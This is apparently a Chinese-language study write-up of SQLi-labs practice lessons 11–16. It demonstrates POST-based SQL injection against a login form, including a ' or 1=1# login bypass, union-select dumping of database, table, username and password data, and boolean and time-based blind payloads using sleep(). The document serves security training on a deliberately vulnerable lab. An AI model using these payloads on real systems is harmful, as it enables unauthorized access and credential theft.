Lesson 11 POST -Error Based - Single Quotes (基于错误的POST型单引号字符型注入)
(1)先输入admin和admin进行登录
sql语句为:
SELECT username, password FROM users WHERE username='admin' and password='admin' LIMIT 0,1
(2)接下来的测试我们需要使用burpsuite,因为在执行登录操作时,我们并不知道进行了怎样的传输。其实是使用了PHP中的POST传输。
A.先手动配置代理,打开burpsuite,点击”submit”,会进行抓包
里面显示了详细的信息,我们只需要最后一句话
B.将其复制,选择post data,粘贴到下面的框中。然后把burpsuite关闭即可
C.进行测试
uname=admin'&passwd=admin&submit=Submit
在admin后加一个单引号,出现错误
uname='&passwd=admin&submit=Submit
将admin删掉,只留下单引号还是有错误,说明存在注入漏洞
uname=admin' or 1=1#&passwd=admin&submit=Submit
在admin’后加上or 1=1 #,再次执行,发现登录成功
uname=' or 1=1#&passwd=admin&submit=Submit
此时,把admin去掉,发现依旧能登录成功,验证确实存在注入漏洞
(3)以username为例进行验证,使用order by语句验证列数
uname=' order by 3#&passwd=admin&submit=Submit
返回错误,显示不存在三列
uname=' order by 2#&passwd=admin&submit=Submit
虽然登录失败,但是并没有返回错误,说明是两列
(4)判断完列数后,使用union select语句进行联合查询,查看回显位置
uname=' union select 1,2#&passwd=admin&submit=Submit
回显出位置
(5)接下来就是常规的查库,查表等一系列操作
查询当前使用的数据库
uname=' union select 1,database()#&passwd=admin&submit=Submit
可以看到数据库为security
查看所有库
uname= ' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=admin&submit=Submit
(6)查看表
uname= ' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=admin&submit=Submit
(7)查看字段
uname= ' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=admin&submit=Submit
(8)查看用户和密码信息
用户信息
uname= ' union select 1,group_concat(username) from security.users#&passwd=admin&submit=Submit
密码信息
uname= ' union select 1,group_concat(password) from security.users#&passwd=admin&submit=Submit
(9)一次性查询数据的方法
Lesson 11结束
Lesson 12 POST -Error Based - Double Quotes (基于错误的POST型双引号字符型变形注入)
(1)查询是否存在注入(将admin破坏,加上or 1=1#)
uname='or 1=1#&passwd=admin&submit=Submit
虽然没有成功登录,但是也没有返回错误
uname=" or 1=1#&passwd=admin&submit=Submit
将单引号改成双引号,发现有错误
如何判断是单引号还是双引号,可以看回显的sql语句来观察
包着admin的是双引号加一个单括号,所以就加双引号和一个单括号就行
测试成功
(2)接下来和上一课相同,不做展示,只是练习一下
Lesson 12结束
Lesson 13 POST -Double injection - Single Quotes - String - twist (POST单引号变形双注入)
(1)先进行测试
发现正常登录后,虽然有登录成功,但是并没有回显任何信息
(2)从测试可以看到,包裹着admin的是一个单引号和一个单括号。接下来直接测试即可
uname=admin') or 1=1#&passwd=admin&submit=Submit
也是什么都没有回显
(3)用union select语句进行联合查询,也不显示任何东西,这个时候就能证明是盲注,只有正确才会回显
(4)使用length()函数来猜解数据库长度
(5)使用if语句进行判断
uname=adm') or if(length(database())>1,1,sleep(5))#&passwd=admin&submit=Submit
然后进行猜测,测试数据,最后发现数据库长度为8
(6)然后判断第一个字母,使用left语句直接进行判断
uname=adm') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a'#&passwd=admin&submit=Submit
以这种方法可以查出库的名字
剩下就是查表,查列,查数据的基本操作了,也可借用burpsuite进行爆破,这里不再进行展示
Lesson 13结束
Lesson 14 POST -Double injection - Single Quotes - String - twist (POST单引号变形双注入)
(1)先进行登录测试
uname=admin&passwd=admin&submit=Submit
只有成功登录但是并没有任何回显信息
和13关不同的是,13关包裹admin的是一个单引号和一个单括号,14关包裹admin的是双引号,其他的均相同,不做演示,只练习
Lesson 14结束
Lesson 15 POST-Blind -Boolean-Time Based - Single Quotes (基于Bool型/时间延迟的单引号POST型盲注)
(1)先测试
与13,14课差不多,只是包裹admin的符号不同,只不过这个是单引号
Lesson 15结束
Lesson 16 POST-Blind -Boolean-Time Based - Double Quotes (基于Bool型/时间延迟的双引号POST型盲注)
先测试
这关是双引号和单括号进行包裹,其他与13关相同
Lesson 16结束
